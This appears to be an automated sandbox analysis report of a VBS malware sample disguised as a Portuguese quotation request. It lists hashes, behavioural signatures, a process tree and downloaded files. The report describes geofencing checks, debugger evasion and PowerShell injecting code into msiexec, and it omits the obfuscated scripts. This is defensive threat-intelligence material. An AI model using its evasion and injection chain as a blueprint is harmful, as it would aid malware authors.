Analysis
max time kernel: 135s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-10-2024 14:46
Static task: static1
Behavioral task: behavioral1
Sample: Pedido de Cotação-24100004_lista comercial.vbs
Resource: win7-20240903-en
General
Target: Pedido de Cotação-24100004_lista comercial.vbs
Size: 523KB
MD5: 071b2e84cdf90885bce11e5713dab307
SHA1: ea48ea5b782669f05084a4a1e374ff64c8f581c0
SHA256: 400f748c614f60bac08d298dce6f55abd9c84c944f303ce6106260d93315b741
SHA512: a981122c9f3f2675f116c2b860e6f05016ab7be3a9cd9eee873af4f89ff7d93548cce9c020d79fa7bf191d04f664f127efadfdca5019b5ec2699498837d46664
SSDEEP: 6144:BA/7iXwe0h73QXqs1SQl3GZF+lfd0okbN9VusXmFtzbVHcje9wYYhnQgjDHgs91+:LKhgamowdhkFuW0tXwjQg/p1+FWg
Malware Config
Signatures
Blocklisted process makes network request (7 IoCs)
Processes:
flow 23, pid 2004, powershell.exe
flow 25, pid 2004, powershell.exe
flow 44, pid 1676, msiexec.exe
flow 47, pid 1676, msiexec.exe
flow 49, pid 1676, msiexec.exe
flow 51, pid 1676, msiexec.exe
flow 53, pid 1676, msiexec.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
Key value queried: \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation (WScript.exe)

Processes:
pid 2004 powershell.exe
pid 5100 powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
Processes:
pid 2004 powershell.exe
pid 5100 powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
Processes:
pid 1676 msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes:
pid 5100 powershell.exe
pid 1676 msiexec.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoCs)
Processes:
pid 2808 WerFault.exe, target pid 1676 msiexec.exe

System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (msiexec.exe)

Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
pid 2004 powershell.exe
pid 2004 powershell.exe
pid 5100 powershell.exe
pid 5100 powershell.exe
pid 5100 powershell.exe

Suspicious behavior: MapViewOfSection (1 IoCs)
Processes:
pid 5100 powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
Token: SeDebugPrivilege, pid 2004 powershell.exe
Token: SeDebugPrivilege, pid 5100 powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
Processes:
PID 5072 (WScript.exe) wrote to memory of 2004 (powershell.exe)
PID 5072 (WScript.exe) wrote to memory of 2004 (powershell.exe)
PID 5100 (powershell.exe) wrote to memory of 1676 (msiexec.exe)
PID 5100 (powershell.exe) wrote to memory of 1676 (msiexec.exe)
PID 5100 (powershell.exe) wrote to memory of 1676 (msiexec.exe)
PID 5100 (powershell.exe) wrote to memory of 1676 (msiexec.exe)
Processes
- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"
  Depth: 1
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 5072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[long obfuscated PowerShell script argument, omitted]"
  Depth: 2
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 2004
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "[long obfuscated PowerShell script argument, omitted]"
  Depth: 1
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 5100
  - C:\Windows\SysWOW64\msiexec.exe
    Command line: "C:\Windows\SysWOW64\msiexec.exe"
    Depth: 2
    - Blocklisted process makes network request
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID: 1676
    - C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 1628
      Depth: 3
      - Program crash
      PID: 2808
- C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1676 -ip 1676
  Depth: 1
  PID: 3740
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: cb3bb854ff414cb031c64e184fd44781
  SHA1: f53d30f0585d05a14f7dd82f2d0997ab44b02d62
  SHA256: 42a5d533e9f3aa3407b26bd46789cd5b5f5eb580a51e64ced44c4e34c9c49896
  SHA512: 9fdeb2a9b6fdd107e1ea87e646d295150fb0c8e1d1b32737cfb3fbfec9d2e595e237055676608e3474569e53b45e825b0ce28403de219cd36e48f7a3cb60e047
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 447KB
  MD5: 4fa4bfe12534bd26a9e268a1e659e510
  SHA1: f42014f4e7c0f11f4bb5f559c88310eb6db186a3
  SHA256: 11afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0
  SHA512: 34e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01